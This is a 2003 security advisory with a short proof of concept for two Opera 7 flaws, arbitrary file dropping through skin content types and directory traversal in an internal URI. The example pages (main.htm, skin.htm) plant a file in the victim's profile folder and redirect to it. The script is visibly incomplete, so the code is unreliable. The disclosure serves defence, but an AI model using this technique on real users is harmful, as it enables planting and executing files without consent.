Opera Skinned & Opera Directory Traversal (Additional Details & a Simple Exploit)

Type securityvulns
Reporter Securityvulns
Modified 2003-11-13T00:00:00


Opera Skinned & Opera Directory Traversal (Additional Details & a Simple Exploit): ==================================================================================


While installing Opera, if the "USE SEPARATE SETTINGS FOR EACH USER" option is selected, the "opera7/profile" folder is stored in the "<username>/application data/opera7" location instead of in the Opera root folder. The "profile" folder contains user specific data for different Opera users. Therefore, each user has a different "profile" folder in his "<username>/application data/opera7" folder.

Folders of interest to us in which configuration files are automatically downloaded and stored(like skin, toolbar, mouse, etc.) are subfolders of the "profile" folder and hence are also moved to this location.

In this scenario, the arbitrary files can still be dropped in the respective folders. However, for executing the files, the <username> variable must be known. Other methods of exploiting this scenario may come up later.


This is a simple PoC for the two Opera vulnerabilities detailed in the "Opera Skinned : Arbitrary File Dropping And Execution" and "Opera Web Browser Directory Traversal in Internal URI Protocol" advisories.

"main.htm" is the file which is to be loaded into the browser remotely. This file opens "skin.htm" in a new window. The Content-Type of "skin.htm" should be set as "application/x-opera-skin" on the server. When skin.htm is opened in this way, it is dropped in the "<opera dir>/profile/skin/" folder on the victim's machine. This demonstrates the first vulnerability.

After dropping skin.htm, main.htm is redirected to the local skin.htm. The path of skin.htm is calculated using the second vulnerability. This demonstrates the second vulnerability.

NOTE: Dont forget to set the Content-Type as "application/x-opera-skin" for skin.htm.

---------------START MAIN.HTM----------------



<script language="javascript">

var win=open("skin.htm") // The server should return content-type as // "application/x-opera-skin" for "Skin.htm". "Skin.htm" will be dropped in the "<opera // dir>/profile/skin/" folder.

setTimeout("redir()",2000) //modify according to your situation.

function redir(){

//This uses the // directory traversal flaw mentioned in advisory 2 to get the path of the dropped file. In this // case, it is skin.htm.





<h1>This is the main file</h1>



---------------END MAIN.HTM----------------

---------------START SKIN.HTM----------------


<h1> Opera Skinned!!! </h1><p>This is Skin.htm from "<opera dir>/profile/skin/" in localhost.


---------------END SKIN.HTM----------------

-- S.G.Masood sgmasood@yahoo.com

Hyderabad, India.


This advisory is meant only for the dissemination of information, alerting the general public about a security issue. Use this information at your own discretion.

In brief, the author is not responsible for any use, misuse, abuse of this information. Also, this information is provided "as is" without any warranty of any kind.